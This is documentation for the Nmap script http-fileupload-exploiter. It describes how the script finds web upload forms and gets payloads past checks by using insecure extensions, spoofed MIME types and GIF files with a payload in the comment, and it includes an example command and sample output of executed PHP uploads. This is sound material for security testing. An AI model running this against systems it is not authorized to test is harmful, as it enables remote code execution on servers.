Script http-fileupload-exploiter

Script types: portrule
Categories: intrusive, exploit, vuln

Script Summary

Exploits insecure file upload forms in web applications using various techniques like changing the Content-type header or creating valid image files containing the payload in the comment.

Script Arguments


The script will try to fill every field found in the upload form but that may fail due to fields' restrictions. You can manually fill those fields using this table. For example, {gender = "male", email = ""}. Default: {}


The pages that contain the forms to exploit. For example, {/upload.php, /login.php}. Default: nil (crawler mode on)


Directories with the uploaded files. For example, {/avatars, /photos}. Default: {'/uploads', '/upload', '/file', '/files', '/downloads'}


See the documentation for the slaxml library.

httpspider.doscraping, httpspider.maxdepth, httpspider.maxpagecount, httpspider.noblacklist, httpspider.url, httpspider.useheadfornonwebfiles, httpspider.withindomain, httpspider.withinhost

See the documentation for the httpspider library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library., http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

Example Usage

nmap -p80 --script http-fileupload-exploiter.nse <target>

This script discovers the upload form on the target's page and
attempts to exploit it using 3 different methods:

1) At first, it tries to upload payloads with different insecure
extensions. This will work against a weak blacklist used by a file
name extension verifier.

2) If (1) doesn't work, it will try to upload the same payloads
this time with different Content-type headers, like "image/gif"
instead of the "text/plain". This will trick any mechanisms that
check the MIME type.

3) If (2), doesn't work, it will create some proper GIF images
that contain the payloads in the comment. The interpreter will
see the executable inside some binary garbage. This will bypass
any check of the actual content of the uploaded file.

* Use the vulns library to report.

Script Output

80/tcp open  http    syn-ack
|   Testing page /post.html
|     Successfully uploaded and executed payloads:
|      Filename: 1.php, MIME: text/plain
|_     Filename: 1.php3, MIME: text/plain



  • George Chatzisofroniou

License: Same as Nmap--See